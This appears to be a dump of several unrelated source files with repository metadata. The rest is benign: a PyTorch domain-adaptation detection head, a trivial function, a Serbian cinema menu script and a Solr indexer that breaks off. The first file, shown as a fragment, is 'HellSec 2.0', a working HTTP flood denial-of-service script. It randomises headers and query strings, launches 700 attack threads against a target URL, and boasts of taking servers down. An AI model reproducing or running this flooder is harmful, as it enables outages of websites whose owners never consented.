headers_referers.append('http://www.usatoday.com/search/results?q=')
headers_referers.append('http://engadget.search.aol.com/search?q=')
headers_referers.append('https://steamcommunity.com/market/search?q=')
headers_referers.append('http://filehippo.com/search?q=')
headers_referers.append('http://www.topsiteminecraft.com/site/pinterest.com/search?q=')
headers_referers.append('http://eu.battle.net/wow/en/search?q=')
headers_referers.append('http://engadget.search.aol.com/search?q=')
headers_referers.append('http://careers.gatesfoundation.org/search?q=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://www.usatoday.com/search/results?q=')
headers_referers.append('http://engadget.search.aol.com/search?q=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://www.usatoday.com/search/results?q=')
headers_referers.append('http://engadget.search.aol.com/search?q=')
headers_referers.append('http://www.bing.com/search?q=')
headers_referers.append('http://search.yahoo.com/search?p=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
# generates a Keyword list
def keyword_list():
global keyword_top
keyword_top.append('Ecosistema')
keyword_top.append('Suicide')
keyword_top.append('Vageta')
keyword_top.append('Robin Williams')
keyword_top.append('World Cup')
keyword_top.append('Ca Si Le Roi')
keyword_top.append('Ebola')
keyword_top.append('Malaysia Airlines Flight 370')
keyword_top.append('ALS Ice Bucket Challenge')
keyword_top.append('Flappy Bird')
keyword_top.append('Conchita Wurst')
keyword_top.append('ISIS')
keyword_top.append('Frozen')
keyword_top.append('014 Sochi Winter Olympics')
keyword_top.append('IPhone')
keyword_top.append('Samsung Galaxy S5')
keyword_top.append('Nexus 6')
keyword_top.append('Moto G')
keyword_top.append('Samsung Note 4')
keyword_top.append('LG G3')
keyword_top.append('Xbox One')
keyword_top.append('Apple Watch')
keyword_top.append('Nokia X')
keyword_top.append('Ipad Air')
keyword_top.append('Facebook')
keyword_top.append('Anonymous')
keyword_top.append('DJ Bach')
keyword_top.append('Ecosistema')
keyword_top.append('Suicide')
keyword_top.append('Sex')
keyword_top.append('Robin Williams')
keyword_top.append('World Cup')
keyword_top.append('Ca Si Le Roi')
keyword_top.append('Ebola')
keyword_top.append('Malaysia Airlines Flight 370')
keyword_top.append('ALS Ice Bucket Challenge')
keyword_top.append('Flappy Bird')
keyword_top.append('Conchita Wurst')
keyword_top.append('ISIS')
keyword_top.append('Frozen')
keyword_top.append('014 Sochi Winter Olympics')
keyword_top.append('IPhone')
keyword_top.append('Samsung Galaxy S5')
keyword_top.append('Nexus 6')
keyword_top.append('Moto G')
keyword_top.append('Samsung Note 4')
keyword_top.append('LG G3')
keyword_top.append('Xbox One')
keyword_top.append('Apple Watch')
keyword_top.append('Nokia X')
keyword_top.append('Ipad Air')
keyword_top.append('Facebook')
keyword_top.append('Anonymous')
keyword_top.append('DJ Bach')
keyword_top.append('Ecosistema')
keyword_top.append('Suicide')
keyword_top.append('Sex')
keyword_top.append('Robin Williams')
keyword_top.append('World Cup')
keyword_top.append('Ca Si Le Roi')
keyword_top.append('Ebola')
keyword_top.append('Malaysia Airlines Flight 370')
keyword_top.append('ALS Ice Bucket Challenge')
keyword_top.append('Flappy Bird')
keyword_top.append('Conchita Wurst')
keyword_top.append('ISIS')
keyword_top.append('Frozen')
keyword_top.append('014 Sochi Winter Olympics')
keyword_top.append('IPhone')
keyword_top.append('Samsung Galaxy S5')
keyword_top.append('Nexus 6')
keyword_top.append('Moto G')
keyword_top.append('Samsung Note 4')
keyword_top.append('LG G3')
keyword_top.append('Xbox One')
keyword_top.append('Apple Watch')
keyword_top.append('Nokia X')
keyword_top.append('Ipad Air')
keyword_top.append('Facebook')
keyword_top.append('Anonymous')
keyword_top.append('DJ Bach')
keyword_top.append('Ecosistema')
keyword_top.append('Suicide')
keyword_top.append('Sex')
keyword_top.append('Robin Williams')
keyword_top.append('World Cup')
keyword_top.append('Ca Si Le Roi')
keyword_top.append('Ebola')
keyword_top.append('Malaysia Airlines Flight 370')
keyword_top.append('ALS Ice Bucket Challenge')
keyword_top.append('Flappy Bird')
keyword_top.append('Conchita Wurst')
keyword_top.append('ISIS')
keyword_top.append('Frozen')
keyword_top.append('014 Sochi Winter Olympics')
keyword_top.append('IPhone')
keyword_top.append('Samsung Galaxy S5')
keyword_top.append('Nexus 6')
keyword_top.append('Moto G')
keyword_top.append('Samsung Note 4')
keyword_top.append('LG G3')
keyword_top.append('Xbox One')
keyword_top.append('Apple Watch')
keyword_top.append('Nokia X')
keyword_top.append('Ipad Air')
keyword_top.append('Facebook')
keyword_top.append('Anonymous')
keyword_top.append('DJ Bach')
keyword_top.append('Ecosistema')
keyword_top.append('Suicide')
keyword_top.append('Sex')
keyword_top.append('Robin Williams')
keyword_top.append('World Cup')
keyword_top.append('Ca Si Le Roi')
keyword_top.append('Ebola')
keyword_top.append('Malaysia Airlines Flight 370')
keyword_top.append('ALS Ice Bucket Challenge')
keyword_top.append('Flappy Bird')
keyword_top.append('Conchita Wurst')
keyword_top.append('ISIS')
keyword_top.append('Frozen')
keyword_top.append('014 Sochi Winter Olympics')
keyword_top.append('IPhone')
keyword_top.append('Samsung Galaxy S5')
keyword_top.append('Nexus 6')
keyword_top.append('Moto G')
keyword_top.append('Samsung Note 4')
keyword_top.append('LG G3')
keyword_top.append('Xbox One')
keyword_top.append('Apple Watch')
keyword_top.append('Nokia X')
keyword_top.append('Ipad Air')
keyword_top.append('Facebook')
keyword_top.append('Anonymous')
keyword_top.append('DJ Bach')
keyword_top.append('Ecosistema')
keyword_top.append('Suicide')
keyword_top.append('Sex')
keyword_top.append('Robin Williams')
keyword_top.append('World Cup')
keyword_top.append('Ca Si Le Roi')
keyword_top.append('Ebola')
keyword_top.append('Malaysia Airlines Flight 370')
keyword_top.append('ALS Ice Bucket Challenge')
keyword_top.append('Flappy Bird')
keyword_top.append('Conchita Wurst')
keyword_top.append('ISIS')
keyword_top.append('Frozen')
keyword_top.append('014 Sochi Winter Olympics')
keyword_top.append('IPhone')
keyword_top.append('Samsung Galaxy S5')
keyword_top.append('Nexus 6')
keyword_top.append('Moto G')
keyword_top.append('Samsung Note 4')
keyword_top.append('LG G3')
keyword_top.append('Xbox One')
keyword_top.append('Apple Watch')
keyword_top.append('Nokia X')
keyword_top.append('Ipad Air')
keyword_top.append('Facebook')
keyword_top.append('Anonymous')
keyword_top.append('DJ Bach')
keyword_top.append('adidas')
keyword_top.append('ask.fm')
keyword_top.append('adele')
keyword_top.append('HaxStroke')
keyword_top.append('Suicide')
keyword_top.append('Sex')
keyword_top.append('Robin Williams')
keyword_top.append('World Cup')
keyword_top.append('Ca Si Le Roi')
keyword_top.append('Ebola')
keyword_top.append('Malaysia Airlines Flight 370')
keyword_top.append('ALS Ice Bucket Challenge')
keyword_top.append('Flappy Bird')
keyword_top.append('Conchita Wurst')
keyword_top.append('ISIS')
keyword_top.append('Frozen')
keyword_top.append('014 Sochi Winter Olympics')
keyword_top.append('IPhone')
keyword_top.append('Samsung Galaxy S5')
keyword_top.append('Nexus 6')
keyword_top.append('Moto G')
keyword_top.append('Samsung Note 4')
keyword_top.append('LG G3')
keyword_top.append('Xbox One')
keyword_top.append('Apple Watch')
keyword_top.append('Nokia X')
keyword_top.append('Ipad Air')
keyword_top.append('Facebook')
keyword_top.append('Anonymous')
keyword_top.append('DJ Bach')
headers_referers.append('http://' + host + '/')
return(headers_referers)
#builds random ascii string
def buildblock(size):
out_str = ''
for i in range(0, size):
a = random.randint(65, 160)
out_str += chr(a)
return(out_str)
def usage():
print ('HellSec 2.0 - By xS1ender')
print ('')
print ('Usage: HellSec.py (url)')
print ('Example: HellSec.py http://www.google.com/')
print ('Have fun fucking elite\'s servers')
print ('Expect your connection to slow down; This tool is powerful')
print ("\a")
print (\
"""
888 888 888 888 .d8888b.
888 888 888 888 d88P Y88b
888 888 888 888 Y88b.
8888888888 .d88b. 888 888 "Y888b. .d88b. .d8888b
8888888888 d8P Y8b 888 888 "Y88b. d8P Y8b d88P"
888 888 88888888 888 888 "888 88888888 888
888 888 Y8b. 888 888 Y88b d88P Y8b. Y88b.
888 888 "Y8888 888 888 "Y8888P" "Y8888 "Y8888P
""")
#http request
def httpcall(url):
useragent_list()
referer_list()
code=0
if url.count("?")>0:
param_joiner="&"
else:
param_joiner="?"
request = Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10)))
request.add_header('User-Agent', random.choice(headers_useragents))
request.add_header('Cache-Control', 'no-cache')
request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')
request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(50,100)))
request.add_header('Keep-Alive', random.randint(110,160))
request.add_header('Connection', 'keep-alive')
request.add_header('Host',host)
try:
urlopen(request)
except HTTPError as e:
#print e.code
set_flag(1)
print ('[+] Error 500 - Tango Down!')
code=500
except URLError as e:
#print e.reason
sys.exit()
else:
inc_counter()
urlopen(request)
return(code)
#http caller thread
class HTTPThread(threading.Thread):
def run(self):
try:
while flag<2:
code=httpcall(url)
if (code==500) & (safe==1):
set_flag(2)
except Exception as ex:
pass
# monitors http threads and counts requests
class MonitorThread(threading.Thread):
def run(self):
previous=request_counter
while flag==0:
if (previous+150<request_counter) & (previous!=request_counter):
print ("[+] Successfully sent %d packets - HellSec is here to stay" % (request_counter))
previous=request_counter
if flag==2:
print ("\n[*] Killing the proccess, attack has stopped")
#execute
if len(sys.argv) < 2:
usage()
sys.exit()
else:
if sys.argv[1]=="help":
usage()
sys.exit()
else:
print ("[*] Engaging Attack")
if len(sys.argv)== 3:
if sys.argv[2]=="safe":
set_safe()
url = sys.argv[1]
if url.count("/")==2:
url = url + "/"
m = re.search('http\://([^/]*)/?.*', url)
host = m.group(1)
for i in range(700):
t = HTTPThread()
t.start()
t = MonitorThread()
t.start()
| [
"noreply@github.com"
] | JOJO123218.noreply@github.com |
5c48292c1a0e15ded45f817f64d7dc0f5106c3a5 | 7dfabdddeb5b8f1628e445cdb6d536958c8bc85b | /pcdet/models/dense_heads/anchor_head_fuse_context_fpn.py | d59a820290723d6120f227037cd95e972f181593 | [
"Apache-2.0"
] | permissive | vehxianfish/SRDAN_Open | d6ba16ebc201c9651fac16bc30f57dc3a740041f | 47c1bd9d2369d8e486b18a7aea220af7324c9011 | refs/heads/master | 2023-08-15T10:36:56.483018 | 2021-09-25T03:35:53 | 2021-09-25T03:35:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,507 | py | import numpy as np
import torch
import torch.nn as nn
from .anchor_head_template import AnchorHeadTemplate
class GradReverse(torch.autograd.Function):
    """Gradient reversal/scaling layer.

    Forward is the identity; backward multiplies the incoming gradient by
    ``lambd``. Callers in this file pass a negative factor (``l * -1``) to
    reverse gradients for adversarial domain adaptation.

    Note: the original implementation used the legacy stateful-instance
    ``autograd.Function`` style (``__init__`` + instance ``forward``/
    ``backward``), which raises ``RuntimeError`` on PyTorch >= 1.3. This
    version uses the required static-method + ``ctx`` API.
    """

    @staticmethod
    def forward(ctx, x, lambd):
        # Stash the scale factor for the backward pass; output equals input.
        ctx.lambd = lambd
        return x.view_as(x)

    @staticmethod
    def backward(ctx, grad_output):
        # Scale the gradient w.r.t. x; lambd is a plain float, so it gets None.
        return grad_output * ctx.lambd, None


def grad_reverse(x, lambd):
    """Apply gradient reversal/scaling with factor ``lambd`` to tensor ``x``."""
    return GradReverse.apply(x, lambd)
class AnchorHeadFuseContextFPN(AnchorHeadTemplate):
def __init__(self, model_cfg, input_channels, num_class, class_names, grid_size, point_cloud_range, predict_boxes_when_training=True, nusc=False, input_channels_fpn=None, num_fpn_up=0, num_fpn_downup=0, fpn_layers=[], **kwargs):
super().__init__(
model_cfg=model_cfg, num_class=num_class, class_names=class_names, grid_size=grid_size, point_cloud_range=point_cloud_range,
predict_boxes_when_training=predict_boxes_when_training, nusc=nusc,num_fpn_up=num_fpn_up, num_fpn_downup=num_fpn_downup, fpn_layers=fpn_layers
)
self.num_anchors_per_location = sum(self.num_anchors_per_location)
self.input_channels_fpn = input_channels_fpn
self.context_num = self.num_fpn_up + self.num_fpn_downup
if self.num_fpn_downup > 0:
self.context_num += 1
#256 512
self.context_num += 2 # point context 256*2=512
# print("self.context_num", self.context_num)
###################
if not self.fpn_only:
self.conv_cls = nn.Conv2d(
input_channels+self.context_num*256, self.num_anchors_per_location * self.num_class,
kernel_size=1
)
self.conv_box = nn.Conv2d(
input_channels+self.context_num*256, self.num_anchors_per_location * self.box_coder.code_size,
kernel_size=1
)
######## FPN #########
self.conv_cls_fpn = nn.ModuleDict()
self.conv_box_fpn = nn.ModuleDict()
for layer in self.fpn_layers:
self.num_anchors_per_location_fpn[layer] = sum(self.num_anchors_per_location_fpn[layer]) # 2, 7
self.conv_cls_fpn[layer] = nn.Conv2d(
self.input_channels_fpn[layer]+self.context_num*256, self.num_anchors_per_location_fpn[layer] * self.num_class,
kernel_size=1
)# 512 -> 2
self.conv_box_fpn[layer] = nn.Conv2d(
self.input_channels_fpn[layer]+self.context_num*256, self.num_anchors_per_location_fpn[layer] * self.box_coder.code_size,
kernel_size=1
)# 512 -> 14
######### dir cls #########
if self.model_cfg.get('USE_DIRECTION_CLASSIFIER', None) is not None:
if not self.fpn_only:
self.conv_dir_cls = nn.Conv2d(
input_channels+self.context_num*256,
self.num_anchors_per_location * self.model_cfg.NUM_DIR_BINS,
kernel_size=1
)
self.conv_dir_cls_fpn = nn.ModuleDict()
for layer in self.fpn_layers:
self.conv_dir_cls_fpn[layer] = nn.Conv2d(
self.input_channels_fpn[layer]+self.context_num*256,
self.num_anchors_per_location_fpn[layer] * self.model_cfg.NUM_DIR_BINS,
kernel_size=1
)
else:
self.conv_dir_cls = None
for layer in self.fpn_layers:
self.conv_dir_cls_fpn[layer] = None
self.num_keypoints = 2048#self.model_cfg.NUM_KEYPOINTS
self.point_fc = nn.Sequential(nn.Linear(self.num_keypoints, 512), nn.ReLU(True), nn.Dropout())
# print("USE_DOMAIN_CLASSIFIER", self.model_cfg.get('USE_DOMAIN_CLASSIFIER', None))
if self.model_cfg.get('USE_DOMAIN_CLASSIFIER', None):
if not self.fpn_only:
self.domain_pool = nn.AdaptiveAvgPool2d(1)
self.domain_classifier = nn.Sequential(nn.Linear(input_channels+512, 1024),
nn.ReLU(True), nn.Dropout(),
nn.Linear(1024, 256), nn.ReLU(True),
nn.Dropout(), nn.Linear(256, 1))
self.domain_pool_fpn = nn.ModuleDict()
self.domain_classifier_fpn = nn.ModuleDict()
for layer in self.fpn_layers:
self.domain_pool_fpn[layer] = nn.AdaptiveAvgPool2d(1)
self.domain_classifier_fpn[layer] = nn.Sequential(nn.Linear(self.input_channels_fpn[layer]+512, 1024),
nn.ReLU(True), nn.Dropout(),
nn.Linear(1024, 256), nn.ReLU(True),
nn.Dropout(), nn.Linear(256, 1))
# print(f"self.input_channels_fpn[{layer}]+512", self.input_channels_fpn[layer]+512)
#256
self.init_weights()
    def init_weights(self):
        """Initialize detection-head parameters.

        Classification biases are set to ``-log((1 - pi) / pi)`` with
        ``pi = 0.01`` (the RetinaNet focal-loss prior) so that early training
        predicts a low foreground probability; box-regression weights get a
        tight zero-mean normal init. Applied to the main head (unless
        ``self.fpn_only``) and to every per-layer FPN head.
        """
        pi = 0.01
        if not self.fpn_only:
            # Main BEV head: focal prior for the cls bias, std=0.001 normal for box weights.
            nn.init.constant_(self.conv_cls.bias, -np.log((1 - pi) / pi))
            nn.init.normal_(self.conv_box.weight, mean=0, std=0.001)
        for layer in self.fpn_layers:
            # Same initialization scheme for each FPN head.
            nn.init.constant_(self.conv_cls_fpn[layer].bias, -np.log((1 - pi) / pi))
            nn.init.normal_(self.conv_box_fpn[layer].weight, mean=0, std=0.001)
    def forward(self, data_dict):
        """Detection-head forward pass with domain-adversarial branches.

        Reads 2D spatial features and point features from ``data_dict``,
        writes predictions and (in training) assigned targets into
        ``self.forward_ret_dict``, and returns the mutated ``data_dict``.

        ``t_mode`` selects behaviour:
        - contains 'dom_img'      -> run the image-level domain classifiers
                                     (through gradient reversal);
        - contains 'dom_img_det'  -> additionally run the detection convs,
                                     conditioned on the domain-head context;
        - contains 'pseudo'       -> targets are assigned in pseudo-label mode.
        """
        # print("spatial_features_2d", spatial_features_2d.shape) 126
        t_mode = data_dict['t_mode']
        # l: coefficient passed to grad_reverse (presumably the GRL lambda
        # schedule value) -- TODO confirm against the trainer.
        l = data_dict['l']
        # Domain label of this batch: True = source, False = target,
        # None = not a domain-classification pass.
        if t_mode == 'dom_img_src':
            dom_src = True
        elif t_mode == 'dom_img_tgt':
            dom_src = False
        else:
            dom_src = None
        if 'pseudo' in t_mode:
            pseudo = True
        else:
            pseudo = False
        spatial_features_2d = data_dict['spatial_features_2d']
        point_features_2d = data_dict['point_features']
        # print("spatial_features_2d", spatial_features_2d.shape) # 2,512,126,126
        # print("point_features_2d", point_features_2d.shape) # 2,2048
        # Average over the last axis of the point features, then project the
        # per-sample num_keypoints vector through the point FC stack.
        point_features_avg = torch.mean(point_features_2d, -1)
        # print("point_features_avg", point_features_avg.shape)
        batch_point_features = point_features_avg.view(-1, self.num_keypoints)
        x_pool_point = self.point_fc(batch_point_features)
        ################# DOM #################
        # Image-level domain classifier on the main (non-FPN) feature map.
        if 'dom_img' in t_mode and not self.fpn_only:
            x_pool = self.domain_pool(spatial_features_2d).view(spatial_features_2d.size(0), -1)
            # Joint image + point feature vector for the domain head.
            x_pool_joint = torch.cat((x_pool, x_pool_point),dim=-1)
            # Gradient reversal makes the backbone adversarial to the
            # domain classifier.
            x_reverse = grad_reverse(x_pool_joint, l*-1)
            # domain_classifier[:-2] = everything up to the final
            # Dropout+Linear: its output is kept as a "context" vector that
            # the detection convs can be conditioned on.
            dom_head_context = self.domain_classifier[:-2](x_reverse).squeeze(-1)
            if 'dom_img_det' in t_mode:
                data_dict['dom_head_context'] = dom_head_context
            # Final Dropout+Linear produce the 1-logit domain prediction.
            dom_img_preds = self.domain_classifier[-2:](dom_head_context).squeeze(-1)
            self.forward_ret_dict['dom_img_preds'] = dom_img_preds
            if self.training:
                targets_dict_dom = self.assign_targets(
                    gt_boxes=data_dict['gt_boxes'],
                    dom_src=dom_src,
                    pseudo=pseudo
                )
                self.forward_ret_dict.update(targets_dict_dom)
        ##################### DOM FPN #####################
        # Same domain-classifier pass, repeated for every FPN level.
        if self.num_fpn_up + self.num_fpn_downup > 0:
            # print("fpn")
            for layer in self.fpn_layers:
                if 'dom_img' in t_mode:
                    spatial_features_2d_fpn = data_dict[f'spatial_features_2d_fpn{layer}']
                    x_pool_fpn = self.domain_pool_fpn[layer](spatial_features_2d_fpn).view(spatial_features_2d_fpn.size(0), -1)
                    x_pool_joint_fpn = torch.cat((x_pool_fpn, x_pool_point),dim=-1)
                    x_reverse_fpn = grad_reverse(x_pool_joint_fpn, l*-1)
                    dom_head_context_fpn = self.domain_classifier_fpn[layer][:-2](x_reverse_fpn).squeeze(-1)
                    if 'dom_img_det' in t_mode:
                        data_dict[f'dom_head_context_fpn{layer}'] = dom_head_context_fpn
                    dom_img_preds_fpn = self.domain_classifier_fpn[layer][-2:](dom_head_context_fpn).squeeze(-1)
                    self.forward_ret_dict[f'dom_img_preds_fpn{layer}'] = dom_img_preds_fpn
                    if self.training:
                        targets_dict_dom = self.assign_targets(
                            gt_boxes=data_dict['gt_boxes'],
                            dom_src=dom_src,
                            pseudo=pseudo,
                            fpn_layer=layer
                        )
                        self.forward_ret_dict.update(targets_dict_dom)
        ########## CLS ################
        # Detection pass, conditioned on the concatenated domain contexts.
        if 'dom_img_det' in t_mode:
            dom_point_context = data_dict['dom_point_context']
            # Gather the per-FPN-layer contexts computed above.
            dom_head_context_fpn = []
            for layer in self.fpn_layers:
                dom_head_context_fpn.append(data_dict[f'dom_head_context_fpn{layer}'])
            dom_head_context_all = torch.cat(dom_head_context_fpn, dim=1)
            if not self.fpn_only:
                dom_head_context = data_dict['dom_head_context']
                # Full context = FPN contexts + main-head context + point context.
                dom_head_context_all = torch.cat((dom_head_context_all, dom_head_context, dom_point_context), dim=1)
                # Broadcast the context vector over the spatial grid (H from
                # shape[-2], W from shape[-1]).
                dom_head_context_all_reshape = dom_head_context_all.unsqueeze(-1).unsqueeze(-1).repeat(1,1,spatial_features_2d.shape[-2],spatial_features_2d.shape[-1])
                # combine with context
                spatial_features_2d_context = torch.cat((spatial_features_2d, dom_head_context_all_reshape), dim=1)
                cls_preds = self.conv_cls(spatial_features_2d_context)
                box_preds = self.conv_box(spatial_features_2d_context)
                cls_preds = cls_preds.permute(0, 2, 3, 1).contiguous()  # [N, H, W, C]
                box_preds = box_preds.permute(0, 2, 3, 1).contiguous()  # [N, H, W, C]
                # print("cls_preds", cls_preds.shape) # 126, 126, 2
                # print("box_preds", box_preds.shape) # 126, 126, 14
                self.forward_ret_dict['cls_preds'] = cls_preds
                self.forward_ret_dict['box_preds'] = box_preds
                if self.conv_dir_cls is not None:
                    dir_cls_preds = self.conv_dir_cls(spatial_features_2d_context)
                    dir_cls_preds = dir_cls_preds.permute(0, 2, 3, 1).contiguous()
                    self.forward_ret_dict['dir_cls_preds'] = dir_cls_preds
                else:
                    dir_cls_preds = None
                if self.training:
                    if pseudo:
                        pseudo_weights = data_dict['pseudo_weights']
                    else:
                        pseudo_weights = None
                    targets_dict = self.assign_targets(
                        gt_boxes=data_dict['gt_boxes'],
                        pseudo=pseudo,
                        pseudo_weights=pseudo_weights
                    )
                    self.forward_ret_dict.update(targets_dict)
                if not self.training or self.predict_boxes_when_training:
                    batch_cls_preds, batch_box_preds = self.generate_predicted_boxes(
                        batch_size=data_dict['batch_size'],
                        cls_preds=cls_preds, box_preds=box_preds, dir_cls_preds=dir_cls_preds
                    )
                    data_dict['batch_cls_preds'] = batch_cls_preds
                    data_dict['batch_box_preds'] = batch_box_preds
                    data_dict['cls_preds_normalized'] = False
            else:
                # fpn_only: no main-head context; only point context is appended.
                dom_head_context_all = torch.cat((dom_head_context_all, dom_point_context), dim=1)
            # print("batch_cls_preds", batch_cls_preds)
            # print("batch_box_preds", batch_box_preds)
            # print("data_dict", data_dict['batch_cls_preds'])
            ##################### CLS FPN #####################
            # Context-conditioned detection convs for each FPN level.
            if self.num_fpn_up + self.num_fpn_downup > 0:
                # print("fpn")
                for layer in self.fpn_layers:
                    spatial_features_2d_fpn = data_dict[f'spatial_features_2d_fpn{layer}']
                    # combine with context
                    # NOTE(review): repeat uses shape[-1] twice (the height
                    # repeat count is taken from the width), unlike the
                    # non-FPN path above which uses shape[-2], shape[-1].
                    # Correct only for square feature maps -- confirm.
                    dom_head_context_all_fpn_reshape = dom_head_context_all.unsqueeze(-1).unsqueeze(-1).repeat(1,1,spatial_features_2d_fpn.shape[-1],spatial_features_2d_fpn.shape[-1])
                    # combine with context
                    spatial_features_2d_fpn_context = torch.cat((spatial_features_2d_fpn, dom_head_context_all_fpn_reshape), dim=1)
                    cls_preds = self.conv_cls_fpn[layer](spatial_features_2d_fpn_context)
                    box_preds = self.conv_box_fpn[layer](spatial_features_2d_fpn_context)
                    cls_preds = cls_preds.permute(0, 2, 3, 1).contiguous()  # [N, H, W, C]
                    box_preds = box_preds.permute(0, 2, 3, 1).contiguous()  # [N, H, W, C]
                    # print("cls_preds2", cls_preds.shape) # 1, 252, 252, 2
                    # print("box_preds2", box_preds.shape) # 1, 252, 252, 14
                    self.forward_ret_dict[f'cls_preds_fpn{layer}'] = cls_preds
                    self.forward_ret_dict[f'box_preds_fpn{layer}'] = box_preds
                    if self.conv_dir_cls_fpn[layer] is not None:
                        dir_cls_preds = self.conv_dir_cls_fpn[layer](spatial_features_2d_fpn_context)
                        dir_cls_preds = dir_cls_preds.permute(0, 2, 3, 1).contiguous()
                        self.forward_ret_dict[f'dir_cls_preds_fpn{layer}'] = dir_cls_preds
                    else:
                        dir_cls_preds = None
                    if self.training:
                        if pseudo:
                            pseudo_weights = data_dict['pseudo_weights']
                        else:
                            pseudo_weights = None
                        targets_dict_fpn = self.assign_targets(
                            gt_boxes=data_dict['gt_boxes'],
                            pseudo=pseudo,
                            pseudo_weights=pseudo_weights,
                            fpn_layer=layer
                        )
                        self.forward_ret_dict.update(targets_dict_fpn)
                    if not self.training or self.predict_boxes_when_training:
                        batch_cls_preds, batch_box_preds = self.generate_predicted_boxes(
                            batch_size=data_dict['batch_size'],
                            cls_preds=cls_preds, box_preds=box_preds, dir_cls_preds=dir_cls_preds,
                            fpn_layer=layer
                        )
                        data_dict[f'batch_cls_preds_fpn{layer}'] = batch_cls_preds
                        data_dict[f'batch_box_preds_fpn{layer}'] = batch_box_preds
                        data_dict[f'cls_preds_normalized_fpn{layer}'] = False
                        # print("data_dict fpn", data_dict[f'batch_cls_preds_fpn{layer}'])
        # print("self.forward_ret_dict", self.forward_ret_dict)
        return data_dict
| [
"zhangweichen2006@gmail.com"
] | zhangweichen2006@gmail.com |
ae0589f75dfaf3d4bd56dd724ab1be86d93211b8 | 568d688fc1ee489ef7fc8a930d917b2c111acd46 | /src/mOps/hello.py | 10ae457b9088d73d4d5d7880c2491e3db88d4d29 | [
"BSD-3-Clause"
] | permissive | verbaros/mOps | fcd7b1ae2e2d647caab614375b8ed88607e9705e | 2e4e6753b0fb802ec3b2aa6e83bc290af16e799c | refs/heads/main | 2023-03-29T11:53:39.856743 | 2021-04-04T13:11:33 | 2021-04-04T13:11:33 | 348,343,272 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 31 | py | def hello(x):
return x * x
| [
"thezaza102@gmail.com"
] | thezaza102@gmail.com |
4d911da096648f2c955c09b37077016ea36e6d17 | b4d334e6495f97fa20e4a19d5546cafab49c36c9 | /src/ProdavacPrikaz.py | eaba9e0e89ca580364da502f9887cd0f9cad5505 | [] | no_license | OMKE/CinemaApp | 892cf35312ca0e23e0fe7a33980bbe496210a2a8 | e58d251e0f52f5e60981fdca5f435d3862c6a4d9 | refs/heads/master | 2020-03-21T14:25:11.507322 | 2018-10-11T23:16:09 | 2018-10-11T23:16:09 | 138,656,235 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 816 | py | import PretragaPrikaz
import Prodavac as Prodavac
def prodavacPrikaz():
    """Print the seller menu and hand control to the navigation prompt."""
    separator = 22 * "-"
    menu_lines = [
        separator,
        "",
        "1. Pretraga projekcija",
        "2. Prodaja karata",
        "3. Odjava",
        separator,
        "Unesite broj funkcije",
    ]
    for line in menu_lines:
        print(line)
    prodavacNavigacija()
def prodavacNavigacija():
    """Read a menu choice from stdin (retrying on non-numeric input) and
    dispatch to the chosen function."""
    # Keep prompting until the user types something int()-parseable.
    while True:
        try:
            unosFunkcije = int(input())
            break
        except ValueError:
            print("Unos rijeci nije dozvoljen, pokusajte ponovo")
    if unosFunkcije == 1:
        PretragaPrikaz.pretragaPrikaz()
    elif unosFunkcije == 2:
        Prodavac.prodajaKarti()
    elif unosFunkcije == 3:
        quit()
| [
"noisewavehd@gmail.com"
] | noisewavehd@gmail.com |
46004d74bd264a0af3e6a4f53f89730bc658e2bd | b8e3d0b261416f62c2a8ee5b6e249436e2e61c74 | /replace_vsm.py | f05838ae43a9d4118c9677d4b9f638cb52ff79b9 | [] | no_license | iamchetry/Evaluate-IR-Models | 370628f6ff67b0a82e064a33b6b46182a2cfa8ab | cf67f389fb8e7658603e3e7e9f27298209d61d84 | refs/heads/main | 2023-09-04T12:09:20.415191 | 2021-11-06T16:45:49 | 2021-11-06T16:45:49 | 424,779,087 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,503 | py | import os
import pysolr
import requests
import json
CORE_NAME = "project3_VSM"
AWS_IP = "localhost"
def delete_core(core=CORE_NAME):
    """Delete the given Solr core via the solr CLI (as the solr user) and
    print the shell exit status."""
    command = 'sudo su - solr -c "/opt/solr/bin/solr delete -c {core}"'.format(core=core)
    status = os.system(command)
    print(status)
def create_core(core=CORE_NAME):
    """Create the given Solr core (data-driven schema) via the solr CLI and
    print the shell exit status."""
    command = 'sudo su - solr -c "/opt/solr/bin/solr create -c {core} -n data_driven_schema_configs"'.format(
        core=core)
    status = os.system(command)
    print(status)
class Indexer:
    """Wrapper around a pysolr connection that manages the VSM core's schema
    (via the Solr Schema API) and its documents."""
    def __init__(self):
        # Base Solr URL; CORE_NAME/AWS_IP are module-level constants.
        self.solr_url = f'http://{AWS_IP}:8983/solr/'
        self.connection = pysolr.Solr(self.solr_url + CORE_NAME, always_commit=True, timeout=5000000)
    def do_initial_setup(self):
        """Drop and recreate the core so indexing starts from a clean slate."""
        delete_core()
        create_core()
    def create_documents(self, docs):
        """Index (and commit) the given documents into the core."""
        self.connection.add(docs)
    def retrieve(self):
        """Run a sample dismax query across the three language fields and
        return the top-20 results as (id, score)."""
        return self.connection.search(q='Assad und ISIS auf dem Vormarsch',
                                      **{'defType': 'dismax',
                                         'qf': 'text_en text_de text_ru',
                                         'indent': 'true',
                                         'fl': 'id,score',
                                         'rows': '20',
                                         'wt': 'json'})
    def add_fields(self):
        """Add the tweet fields (language tag, per-language text, URLs and
        hashtags) to the core's schema."""
        data = {
            "add-field": [
                {
                    "name": "lang",
                    "type": "string",
                    "multiValued": False
                },
                {
                    "name": "text_de",
